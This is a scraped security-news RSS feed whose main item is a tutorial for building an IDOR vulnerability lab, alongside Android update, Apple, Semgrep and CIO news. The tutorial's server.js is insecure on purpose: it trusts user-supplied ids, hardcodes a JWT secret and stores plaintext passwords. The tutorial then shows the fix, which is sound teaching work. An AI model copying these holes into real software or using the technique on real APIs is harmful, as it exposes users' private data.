							<a class="price-comparison__view-button" href="https://www.amazon.de/dp/B0GMXRX5JS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vars-product-name="Vivo X300 Pro" data-vars-product-id="3128483" data-vars-category="Smartphones" data-vars-manufacturer-id="18744" data-vars-manufacturer="Vivo" data-vars-vendor="billiger,gtin,amazon,mpn," data-vars-po="billiger,gtin,amazon,mpn" data-product="3128483" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://www.amazon.de/dp/B0GMXRX5JS?tag=pcwelt.de-21&amp;linkCode=ogi&amp;th=1&amp;psc=1&amp;ascsubtag=rss" data-vendor-api="amazon" data-vars-product-price="9.999,00 €" data-vars-product-vendor="Amazon" aria-label="Deal anschauen bei Amazon für 9.999,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Asus</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a3397cf586e2"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/01/Asus-zenphone.jpg?quality=50&amp;strip=all&amp;w=1200" alt="Asus zenphone" class="wp-image-3036644" width="1200" height="544" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><p></p>
</figcaption></figure><p class="imageCredit">Asus</p></div>



<p>Asus hat Anfang 2026 angekündigt, vorerst keine neuen Smartphones zu produzieren. Das heißt aber nicht, dass bereits bestehende Modelle keine Updates mehr erhalten.</p>



<p>Folgende Asus-Smartphones erhalten voraussichtlich das Update auf Android 17:</p>



<ul class="wp-block-list">
<li>ROG Phone 9 / <a href="https://www.pcwelt.de/article/2551760/asus-rog-phone-9-pro-test.html" target="_blank" rel="noreferrer noopener">9 Pro</a></li>



<li>ROG Phone 8 / <a href="https://www.pcwelt.de/article/2202783/asus-rog-phone-8-pro-test.html" target="_blank" rel="noreferrer noopener">8 Pro</a></li>



<li>Zenfone 12 Ultra</li>



<li>Zenfone 11 Ultra</li>
</ul>



<p><strong>Eher kein Android 17:</strong> ROG Phone 7, ROG Phone 7 Ultimate, Zenfone 10.</p>



<p><strong>Asus ROG Phone 9 Pro im Preisvergleich</strong></p>



				<div class="wp-block-price-comparison price-comparison">
		
		<div class="new_products_tab tabcontent ">

			<div class="price-comparison__record price-comparison__record--header">
				<div>
					<span>Shop</span>
				</div>
								<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>

								<div class="price-comparison__record  ">
						<div class="price-comparison__image">
															<span>Asus</span>
													</div>
												<div class="price-comparison__price ">
						<span>1.299,00 €</span>						</div>
						<div>
							<a class="price-comparison__view-button" href="https://rog.asus.com/de/phones/rog-phone-9-pro/" data-vars-product-name="Asus ROG Phone 9 Pro" data-vars-product-id="2524258" data-vars-category="Smartphones" data-vars-manufacturer-id="11291" data-vars-manufacturer="Asus" data-vars-vendor="billiger,gtin,mpn,Asus" data-vars-po="billiger,gtin,mpn" data-product="2524258" data-vars-link-position-id="000" data-vars-link-position="Price Comparison Body" data-vars-outbound-link="https://rog.asus.com/de/phones/rog-phone-9-pro/" data-vars-product-price="1.299,00 €" data-vars-product-vendor="Asus" aria-label="Deal anschauen bei Asus für 1.299,00 €" target="_blank">Jetzt ansehen</a>						</div>
					</div>
						
								<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
													Preisvergleich (über 24.000 Shops weltweit)												</span>
									</div>
		</div>

		<div class="refurbished_products_tab tabcontent">
			<div class="refurbished-padding price-comparison__record price-comparison__record--header">
				<div>
					<span>Produkt</span>
				</div>
				<div class="price-comparison__price">
					<span>Preis</span>
				</div>
			</div>
							<div class="price-comparison__record price-comparison__record--footer">
					<span class="price-comparison__footer-text">
					Preisvergleich von Backmarket						</span>
									</div>
		</div>
		</div>
		


<h2 class="wp-block-heading">Was kann ich tun, wenn mein Gerät kein Android-Update mehr bekommt?</h2>



<p>Wenn Ihr Smartphone keine großen Android-Updates mehr erhält, ist das erst einmal kein Grund zur Panik. Hersteller liefern eine feste Anzahl an Updates aus, die neue Funktionen und Verbesserungen beinhalten. Darüber hinaus gibt es aber auch noch kleinere Updates sowie wichtige Sicherheits-Updates, die unabhängig vom Update auf Android 17 sind.</p>



<p>Sollte sich Ihr Gerät also nicht in der Liste der Modelle befinden, die Android 17 bekommen, prüfen Sie am besten gleich, ob es generell noch Support bekommt, damit Probleme und Sicherheitslücken weiterhin behoben werden. Sollte das nicht der Fall sein, können Sie über die Anschaffung eines <a href="https://www.pcwelt.de/article/1924183/das-beste-smartphone-im-test.html" target="_blank" rel="noreferrer noopener">neuen Smartphones</a> nachdenken, oder Sie installieren ein <a href="https://www.pcwelt.de/article/2990255/beste-alternativen-zu-google-android.html" target="_blank" rel="noreferrer noopener">alternatives Betriebssystem</a>.</p>



<p><strong>Lesetipp:</strong> <a href="https://www.pcwelt.de/article/3156260/ihr-android-handy-hat-ein-ablaufdatum-jetzt-herausfinden.html" target="_blank" rel="noreferrer noopener">Ihr Android-Handy hat ein Ablaufdatum: So finden Sie es heraus</a></p>



<p></p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Build an IDOR Vulnerability Lab: Why WHERE Clauses Don’t Protect Your API.]]></title>
<description><![CDATA[Last time we covered SQL injection. I promised IDOR was next. Today you are going to see why a WHERE clause alone will not save you.When you learn about backend APIs feeding your frontend, you are really glad you get to make a call, some magic that you created happens, and it appears on the scree...]]></description>
<link>https://tsecurity.de/de/3606851/hacking/build-an-idor-vulnerability-lab-why-where-clauses-dont-protect-your-api/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606851/hacking/build-an-idor-vulnerability-lab-why-where-clauses-dont-protect-your-api/</guid>
<pubDate>Thu, 18 Jun 2026 08:51:13 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/926/1*V2_46S-25aZi-MhjB7dWwA.png"></figure><p>Last time we covered <a href="https://medium.com/bugbountywriteup/making-a-sqli-lab-is-not-difficult-build-one-with-me-795964b602db">SQL injection</a>. I promised IDOR was next. Today you are going to see why a WHERE clause alone will not save you.</p><p>When you learn about backend APIs feeding your frontend, you are really glad you get to make a call, some magic that you created happens, and it appears on the screen. The big thing I never learned about in school was the concept of those API calls being modified before they ever reach the server. Because of this, I never really learned how to make queries safe. And no, I am not talking about parameterised queries like in the last blog. Sure I learned to query a database where the records belonged to bob with a WHERE clause, but no one ever told me that this concept of ownership should also be enforced on API calls.</p><h3>Ownership</h3><p>I lightly brushed on the term <em>ownership</em>. Now I want to go a bit further in detail about it.</p><p>Like I already said, in school I learned the basics of the WHERE clause. Put simply, you only retrieve the rows that match a certain column value. Let's say we are CEO of a company and we want to know which assets our employees have. That would be a query like SELECT * FROM assets.</p><pre>[<br>    {"id":1, "lender":"liam", "asset":"Laptop"},<br>    {"id":2, "lender":"bob", "asset":"Desktop"},<br>    {"id":3, "lender":"sarah", "asset":"Mobile Phone"},<br>    {"id":4, "lender":"bob", "asset":"Tablet"},<br>]</pre><p>If the CEO would like to check which assets bob has, we need to add a WHERE clause like SELECT * FROM assets WHERE lender = 'bob'. Instead of four rows, we now get two rows back.</p><pre>[<br>    {"id":2, "lender":"bob", "asset":"Desktop"},<br>    {"id":4, "lender":"bob", "asset":"Tablet"},<br>]</pre><p>This is the principle of ownership. The query only returns what belongs to bob. Simple enough. But ownership is not just a database concern — it also needs to be enforced at the API layer. That is what this lab is about.</p><h3>Lab Tree</h3><p>The lab we will be building today is structured like this.</p><pre>/mediumLabs<br>└── /IDOR<br>    ├── /node_modules<br>    ├── login.html<br>    ├── mySecrets.html<br>    ├── server.js<br>    ├── package-lock.json<br>    └── package.json</pre><p>We will log in and be redirected to a page that will contain all of our personal secrets.</p><h3>Boilerplate</h3><p>Like always, I will provide you with some boilerplate code to get us started.</p><p><strong>login.html</strong></p><pre>&lt;!DOCTYPE html&gt;<br>&lt;html lang="en"&gt;<br>&lt;head&gt;<br>    &lt;meta charset="UTF-8"&gt;<br>    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;<br>    &lt;title&gt;Login&lt;/title&gt;<br>&lt;/head&gt;<br>&lt;body&gt;<br>    &lt;h1&gt;Login&lt;/h1&gt;<br>    &lt;form method="POST" action="/login"&gt;<br>        &lt;div&gt;<br>            &lt;label&gt;Username: &lt;input type="text" name="username" required&gt;&lt;/label&gt;<br>        &lt;/div&gt;<br>        &lt;div&gt;<br>            &lt;label&gt;Password: &lt;input type="password" name="password" required&gt;&lt;/label&gt;<br>        &lt;/div&gt;<br>        &lt;button type="submit"&gt;Login&lt;/button&gt;<br>    &lt;/form&gt;<br>&lt;/body&gt;<br>&lt;/html&gt;</pre><p><strong>mySecrets.html</strong></p><pre>&lt;!DOCTYPE html&gt;<br>&lt;html lang="en"&gt;<br>&lt;head&gt;<br>    &lt;meta charset="UTF-8"&gt;<br>    &lt;meta name="viewport" content="width=device-width, initial-scale=1.0"&gt;<br>    &lt;title&gt;My Secrets&lt;/title&gt;<br>&lt;/head&gt;<br>&lt;body&gt;<br>    &lt;h1&gt;My Secrets&lt;/h1&gt;<br>    &lt;button id="loadBtn"&gt;Load my secrets&lt;/button&gt;<br>    &lt;div id="secrets"&gt;&lt;/div&gt;<br>    &lt;br&gt;<br>    &lt;a href="/logout"&gt;Logout&lt;/a&gt;<br>&lt;script&gt;<br>        function getCookie(name) {<br>            return document.cookie.split('; ').find(r =&gt; r.startsWith(name + '='))?.split('=')[1];<br>        }<br>        function decodeJWT(token) {<br>            return JSON.parse(atob(token.split('.')[1]));<br>        }<br>        document.getElementById('loadBtn').addEventListener('click', async () =&gt; {<br>            const token = getCookie('token');<br>            const payload = decodeJWT(token);<br>            const userId = payload.id;<br>            const res = await fetch(`/api/secrets/${userId}`);<br>            const secrets = await res.json();<br>            const container = document.getElementById('secrets');<br>            container.innerHTML = secrets.map(s =&gt;<br>                `&lt;div&gt;&lt;strong&gt;${s.title}&lt;/strong&gt;: ${s.content}&lt;/div&gt;`<br>            ).join('');<br>        });<br>    &lt;/script&gt;<br>&lt;/body&gt;<br>&lt;/html&gt;</pre><p><strong>server.js</strong></p><pre>const express = require('express');<br>const Database = require('better-sqlite3');<br>const jwt = require('jsonwebtoken');<br>const path = require('path');<br>const app = express();<br>const db = new Database(':memory:');<br>const JWT_SECRET = 'idor-lab-secret';<br>db.exec(`<br>  CREATE TABLE users (<br>    id INTEGER PRIMARY KEY,<br>    username TEXT,<br>    password TEXT<br>  )<br>`);<br>db.exec(`<br>  CREATE TABLE secrets (<br>    id INTEGER PRIMARY KEY,<br>    user_id INTEGER,<br>    title TEXT,<br>    content TEXT<br>  )<br>`);<br>const insertUser = db.prepare('INSERT INTO users (username, password) VALUES (?, ?)');<br>[<br>  ['alice', 'alice123'],<br>  ['bob',   'bob123'],<br>  ['carol', 'carol123'],<br>  ['dave',  'dave123'],<br>].forEach(([u, p]) =&gt; insertUser.run(u, p));<br>const insertSecret = db.prepare('INSERT INTO secrets (user_id, title, content) VALUES (?, ?, ?)');<br>[<br>  [1, 'Bank PIN',          '4821'],<br>  [1, 'Email password',    'alice@secret99'],<br>  [1, 'SSH passphrase',    'fluffy_bunny_2024'],<br>  [2, 'Credit card CVV',   '737 (card ending 4242)'],<br>  [2, 'WiFi password',     'supersecret42'],<br>  [2, 'Work credentials',  'bob@corp.com / W0rkPass!'],<br>  [2, 'Personal diary',    'I have a crush on alice...'],<br>  [3, 'Crypto seed',       'apple mango tiger cloud'],<br>  [3, 'API key',           'sk-prod-xK92mL0pQ7rN3wZv'],<br>  [3, 'Server password',   'root@prod: C4r0l$3cur3!'],<br>  [3, 'Secret project',    'Launching project X next month'],<br>  [4, 'Master password',   'D4ve_M4sterP@ss!'],<br>  [4, 'SSN',               '123-45-6789'],<br>  [4, 'Private key',       '-----BEGIN RSA PRIVATE KEY----- (truncated)'],<br>  [4, 'Hidden account',    'shadow-bank.io: dave / hidden99'],<br>].forEach(([uid, title, content]) =&gt; insertSecret.run(uid, title, content));<br>app.use(express.urlencoded({ extended: false }));<br>function getToken(req) {<br>  const match = (req.headers.cookie || '').match(/token=([^;]+)/);<br>  return match ? match[1] : null;<br>}<br>function requireAuth(req, res, next) {<br>  try {<br>    req.user = jwt.verify(getToken(req), JWT_SECRET);<br>    next();<br>  } catch {<br>    res.redirect('/');<br>  }<br>}<br>app.get('/', (req, res) =&gt; res.sendFile(path.join(__dirname, 'login.html')));<br>app.post('/login', (req, res) =&gt; {<br>  const { username, password } = req.body;<br>  const user = db.prepare('SELECT * FROM users WHERE username = ? AND password = ?').get(username, password);<br>  if (!user) return res.redirect('/?error=Invalid+credentials');<br>  const token = jwt.sign({ id: user.id, username: user.username }, JWT_SECRET, { expiresIn: '1h' });<br>  res.setHeader('Set-Cookie', `token=${token}; Path=/`);<br>  res.redirect('/secrets');<br>});<br>app.get('/secrets', requireAuth, (req, res) =&gt; res.sendFile(path.join(__dirname, 'mySecrets.html')));<br>app.get('/api/secrets/:id', requireAuth, (req, res) =&gt; {<br>  const secrets = db.prepare('SELECT * FROM secrets WHERE user_id = ?').all(req.params.id);<br>  res.json(secrets);<br>});<br>app.get('/logout', (req, res) =&gt; {<br>  res.setHeader('Set-Cookie', 'token=; Max-Age=0; Path=/');<br>  res.redirect('/');<br>});<br>app.listen(3000, () =&gt; console.log('Listening on http://localhost:3000'));</pre><p><strong>package.json</strong></p><pre>{<br>  "name": "idor",<br>  "version": "1.0.0",<br>  "description": "",<br>  "license": "ISC",<br>  "author": "",<br>  "type": "commonjs",<br>  "main": "server.js",<br>  "scripts": {<br>    "start": "node server.js",<br>    "dev": "nodemon server.js"<br>  },<br>  "dependencies": {<br>    "better-sqlite3": "^12.10.0",<br>    "express": "^5.2.1",<br>    "jsonwebtoken": "^9.0.3",<br>    "nodemon": "^3.1.14"<br>  }<br>}</pre><h3>Wait. What Is Vulnerable Here?</h3><p>If you read through server.js, it looks pretty solid at first glance. We have a requireAuth middleware. We have a WHERE clause in the query. Passwords are checked. Tokens are verified. So what is the problem?</p><p>Look at this endpoint specifically:</p><pre>app.get('/api/secrets/:id', requireAuth, (req, res) =&gt; {<br>  const secrets = db.prepare('SELECT * FROM secrets WHERE user_id = ?').all(req.params.id);<br>  res.json(secrets);<br>});</pre><p>The WHERE user_id = ? clause does enforce ownership at the database level. But notice what value we are passing in: req.params.id. That value comes from the URL. And the URL comes from the user.</p><p>In Burp Suite, our request looks like this.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*yZhTgYttIm3zLClFAXesAQ.png"></figure><p>Seems fine, right? We are logged in as alice, we are requesting ID 1, and alice is user 1. All good.</p><p>Now watch what happens when we just change that ID.</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*GeckmrSg2o1_iBmEffrTyA.png"></figure><p>We are still authenticated as Alice. But we are now reading Bob’s secrets. The server never checked whether Alice is actually allowed to request data for user 2. It just trusted the number in the URL.</p><h3>The Problem</h3><p>The query checks that the data belongs to a user. It does not check that the user making the request <em>is</em> that user.</p><p>Those are two completely different things, and conflating them is exactly what makes IDOR such a common and damaging vulnerability. The database is doing its job. The problem is that we never told the application to verify that the ID in the URL matches the identity of the person asking.</p><h3>Enforcing Ownership Server Side</h3><p>The fix is one line of code:</p><pre>app.get('/api/secrets/:id', requireAuth, (req, res) =&gt; {<br>  if (req.user.id !== parseInt(req.params.id)) return res.status(403).json({ error: 'Forbidden' });<br>  const secrets = db.prepare('SELECT * FROM secrets WHERE user_id = ?').all(req.user.id);<br>  res.json(secrets);<br>});</pre><p>We compare req.user.id (which comes from the verified JWT via requireAuth) against req.params.id (which comes from the URL). If they do not match, the request is rejected with a 403 Forbidden before we ever touch the database.</p><p>Notice that we also changed the query to use req.user.id instead of req.params.id. Since we have already verified they match, this makes the URL parameter irrelevant. The only ID that matters is the one baked into the token.</p><blockquote><em>req.user is the decoded JWT payload set by </em><em>requireAuth. Because the token is cryptographically signed, it cannot be tampered with by the client. That is why we can trust it. That is also why a weak or misconfigured JWT implementation would immediately undermine this entire defence.</em></blockquote><h3>JWT</h3><p>Which brings us to next time. A solid ownership check is only as strong as the token backing it. Next time we will look at two ways JWT implementation can go wrong and how attackers exploit both. Until then.</p><blockquote>I break web apps for fun, make vulnerable labs to learn, and write about it so you can too.</blockquote><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=e5bd6528c339" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/build-an-idor-vulnerability-lab-why-where-clauses-dont-protect-your-api-e5bd6528c339">Build an IDOR Vulnerability Lab: Why WHERE Clauses Don’t Protect Your API.</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI-driven chip shortages to cause Apple product price increase, says Cook]]></title>
<description><![CDATA[Apple has attempted to shield customers from memory and storage chip price increases, but it has "become unsustainable." Price change timing hasn't been shared.Chip shortages could affect iPhone pricing in the fallOne of the most predictable parts of Apple is its price structure. It's basically a...]]></description>
<link>https://tsecurity.de/de/3606243/ios-mac-os/ai-driven-chip-shortages-to-cause-apple-product-price-increase-says-cook/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3606243/ios-mac-os/ai-driven-chip-shortages-to-cause-apple-product-price-increase-says-cook/</guid>
<pubDate>Wed, 17 Jun 2026 23:54:17 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Apple has attempted to shield customers from memory and storage chip price increases, but it has "become unsustainable." Price change timing hasn't been shared.<br><br><div><img src="https://photos5.appleinsider.com/gallery/67981-143313-iPhone-17-Pro-Max-held-xl.jpg" alt="Hand holding a dark blue iPhone with dual rear cameras and Apple logo, raised against a background of green, sunlit tree leaves and softly blurred sky" height="738"><br><span>Chip shortages could affect iPhone pricing in the fall</span></div><br>One of the most predictable parts of Apple is its price structure. It's basically a feature of the product, so <a href="https://appleinsider.com/articles/26/01/29/memory-cost-explosion-wont-hurt-apple-too-badly-in-q2-may-sting-in-q3">price changes</a> are very rare and heavily considered.<br><br>In <a href="https://www.wsj.com/tech/apple-price-increases-memory-supply-199845b1">an interview</a> with <em>The Wall Street Journal</em>, Apple CEO <a href="https://appleinsider.com/inside/tim-cook" title="Tim Cook" data-kpt="1">Tim Cook</a> says that product prices will have to increase to account for chip shortages. While the company has worked its usual supply chain magic to <a href="https://appleinsider.com/articles/25/12/16/iphone-will-do-pretty-well-in-2026-as-ram-prices-hammer-the-smartphone-industry">mitigate costs</a>, things have exceeded its ability to shield customers.<br><br><br> <a href="https://appleinsider.com/articles/26/06/17/ai-driven-ship-shortages-to-cause-apple-product-price-increase-says-cook?utm_source=rss">Continue Reading on AppleInsider</a> | <a href="https://forums.appleinsider.com/discussion/244687?urm_source=rss">Discuss on our Forums</a>]]></content:encoded>
</item>
<item>
<title><![CDATA[Epic wants to let you bring your Fortnite skins to other games]]></title>
<description><![CDATA[Epic Games has been touting the potential of an interoperable metaverse for years, though that vision hasn't yet become a reality. But with Unreal Engine 6, the next major version of its game development engine, Epic plans to take a big step toward that theoretical future: it will let developers ...]]></description>
<link>https://tsecurity.de/de/3605907/it-nachrichten/epic-wants-to-let-you-bring-your-fortnite-skins-to-other-games/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605907/it-nachrichten/epic-wants-to-let-you-bring-your-fortnite-skins-to-other-games/</guid>
<pubDate>Wed, 17 Jun 2026 21:17:50 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Epic Games has been touting the potential of an interoperable metaverse for years, though that vision hasn't yet become a reality. But with Unreal Engine 6, the next major version of its game development engine, Epic plans to take a big step toward that theoretical future: it will let developers make games that can use […]]]></content:encoded>
</item>
<item>
<title><![CDATA[Release v1.167.0]]></title>
<description><![CDATA[1.167.0 - 2026-06-17
### Added

Added support for more operators for folding for constant propagation, including subtraction, division, bit ops, bit shifts, comparisons, and more. (const-folding)
Added a nosemgrep_disabled field to the scan configuration so the platform can disable nosemgrep inli...]]></description>
<link>https://tsecurity.de/de/3605822/it-security-tools/release-v11670/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605822/it-security-tools/release-v11670/</guid>
<pubDate>Wed, 17 Jun 2026 20:34:39 +0200</pubDate>
<category>💾 IT Security Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2><a href="https://github.com/semgrep/semgrep/releases/tag/v1.167.0">1.167.0</a> - 2026-06-17</h2>
<h3>### Added</h3>
<ul>
<li>Added support for more operators for folding for constant propagation, including subtraction, division, bit ops, bit shifts, comparisons, and more. (const-folding)</li>
<li>Added a <code>nosemgrep_disabled</code> field to the scan configuration so the platform can disable <code>nosemgrep</code> inline ignore comments org-wide for a scan. (APPEX-1122)</li>
<li>Semgrep now skips binary files (images, archives, compiled executables,<br>
etc.) during scanning by default, detected via matching file extensions<br>
to known file-format magic bytes Pass <code>--no-exclude-binary-files</code> to<br>
scan binary files as before. (ENGINE-2708)</li>
</ul>
<h3>### Fixed</h3>
<ul>
<li><code>semgrep ci</code> with <code>--sarif</code> now correctly populates the output's <code>ignores</code><br>
field with nosemgrep-suppressed findings, in accordance with other output<br>
formatters. (<a class="issue-link js-issue-link" data-error-text="Failed to load title" data-id="1472222925" data-permission-text="Title is private" data-url="https://github.com/semgrep/semgrep/issues/6651" data-hovercard-type="pull_request" data-hovercard-url="/semgrep/semgrep/pull/6651/hovercard" href="https://github.com/semgrep/semgrep/pull/6651">gh-6651</a>)</li>
</ul>
<h3>### Infra/Release Changes</h3>
<ul>
<li>
<p>Updated the <code>ocaml-tree-sitter-core</code> submodule to the latest upstream <code>main</code>, providing</p>
<ul>
<li>improved thread-safety</li>
<li>bumps the tree-sitter CLI option used from 0.20.6 to 0.20.8.</li>
</ul>
<p>(ocaml-tree-sitter-core-bump)</p>
</li>
</ul>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cursemark Preview (PC)]]></title>
<description><![CDATA[Have you ever wanted to play a pixelated diablo with cool loot, excellent magic and intense gameplay? Cursemark is a title that wants to cover all those things, and even if it’s just in early access, it already feels incredibly promising. The game offers a great combination of melee and spellcast...]]></description>
<link>https://tsecurity.de/de/3605024/it-security-nachrichten/cursemark-preview-pc/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3605024/it-security-nachrichten/cursemark-preview-pc/</guid>
<pubDate>Wed, 17 Jun 2026 15:54:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Have you ever wanted to play a pixelated diablo with cool loot, excellent magic and intense gameplay? Cursemark is a title that wants to cover all those things, and even if it’s just in early access, it already feels incredibly promising. The game offers a great combination of melee and spellcasting, with a large array of runes you can implement for even better results.

You can be more melee-focused, but still use wards, ultimates and spells in order to become the ultimate killing machine. The game is room/level based, as you clear a room and then move on to the next. There are different biomes and enemy types, and also plenty of bosses. Even if the game is in early access and still incomplete, the content that’s there was extremely impressive for me.

What stands out in Cursemark is definitely its combat and great attention to detail. The game map looks stunning, and every level is detailed, even if the graphics are pixelated. They even have a CRT mode, which bring...]]></content:encoded>
</item>
<item>
<title><![CDATA[5 things CIOs must do as sovereignty becomes a design constraint]]></title>
<description><![CDATA[For years, enterprise IT strategy operated on three assumptions: infrastructure could be global, vendors could be consolidated, and location had little impact on risk or compliance. That model is breaking down. As geopolitical tensions rise, AI regulation accelerates, and supply chains become mor...]]></description>
<link>https://tsecurity.de/de/3604351/it-security-nachrichten/5-things-cios-must-do-as-sovereignty-becomes-a-design-constraint/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3604351/it-security-nachrichten/5-things-cios-must-do-as-sovereignty-becomes-a-design-constraint/</guid>
<pubDate>Wed, 17 Jun 2026 12:08:52 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>For years, enterprise IT strategy operated on three assumptions: infrastructure could be global, vendors could be consolidated, and location had little impact on risk or compliance. That model is breaking down. As geopolitical tensions rise, AI regulation accelerates, and supply chains become more fragile, CIOs are being forced to rethink not just where technology runs, but how it’s sourced, governed, and secured.</p>



<p>“Three years ago, sourcing decisions always started with total cost of ownership,” says Jochen Jaser, CIO of open-source software company SUSE. “But that’s not the dominant frame anymore. Now it starts more like a risk register.”</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="828" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Jochen Jaser, SUSE</p>
</figcaption></figure><p class="imageCredit">SUSE</p></div>



<p>That shift is reshaping enterprise architecture decisions at multiple levels. CIOs are reassessing dependence on hyperscalers, evaluating sovereign cloud options, and paying closer attention to where data resides and how it moves across jurisdictions. According to Shannon Bell, EVP, CIO, and CDO at enterprise information management company OpenText, “geopolitical risk has become a core architecture and sourcing consideration.”</p>



<p>The result is a more fragmented and complex operating environment. Gartner analyst Luis Pinto says organizations increasingly view geography as an architectural constraint rather than a secondary deployment issue, while Ron Babin, IDC advisor and professor at Toronto Metropolitan University, says CIOs must now navigate a growing patchwork of regional regulatory requirements.</p>



<p><a href="https://www.cio.com/article/4168673/can-an-ai-be-a-competent-leader-lets-find-out.html?utm=hybrid_search">As AI becomes more deeply embedded in enterprise operations</a>, the strategic importance of data itself is also changing. CIOs are paying closer attention not only to where data is stored, but how it’s accessed, moved, and protected across borders.</p>



<p>“The business transcends borders, but your data can’t always do the same,” says Matt Stern, CSO at Hypori, a secure mobile access provider.</p>



<p>Organizations aren’t abandoning global platforms, but they’re redesigning how they use them. As sovereignty becomes a permanent strategic constraint, here are five things CIOs must do in response.</p>



<h2 class="wp-block-heading">1. Treat geography as a core architectural decision</h2>



<p>The most fundamental change is conceptual since location is now a design variable rather than a deployment detail. For years, CIOs optimized for scale and efficiency, often centralizing workloads in a handful of hyperscale cloud environments. That approach assumed stable global access and predictable regulatory conditions. Today, those assumptions no longer hold.<br><br>“Where technology is located and who has operational control over it is now a major business risk,” Pinto says. Organizations are responding by paying closer attention to data residency and access rights.</p>


<div class="extendedBlock-wrapper block-coreImage left"><figure class="wp-block-image alignleft size-1240-r3:2 is-resized"> width="1240" height="827" sizes="auto, (max-width: 1240px) 100vw, 1240px"&gt;<figcaption class="wp-element-caption"><p>Luis Pinto, Gartner</p>
</figcaption></figure><p class="imageCredit">Gartner</p></div>



<p>Jaser adds that the shift is forcing organizations to rethink even <a href="https://www.cio.com/article/4107377/cios-will-underestimate-ai-infrastructure-costs-by-30.html?utm=hybrid_search">basic infrastructure assumptions</a>. “Usually you’d just go with AWS, Google, and on-prem,” he says. “But now as digital sovereignty requirements are coming into space, we need to look for sovereign cloud offerings.”</p>



<p>That doesn’t mean abandoning hyperscalers entirely. SUSE itself operates a hybrid infrastructure spanning commercial clouds and its own data centers. Instead, Jaser says organizations are becoming more selective about workload placement, evaluating which systems require stronger sovereignty protections, and which can remain in global environments.</p>



<p>The shift is also reshaping operating models. According to Bell, workload placement strategies are increasingly driven by sensitivity of data, regulatory exposure, and operational risk. “We’re moving from a cloud-first mindset to more of a fit-for-purpose approach,” she says.</p>



<h2 class="wp-block-heading">2. Design for multi-jurisdiction resilience, not efficiency</h2>



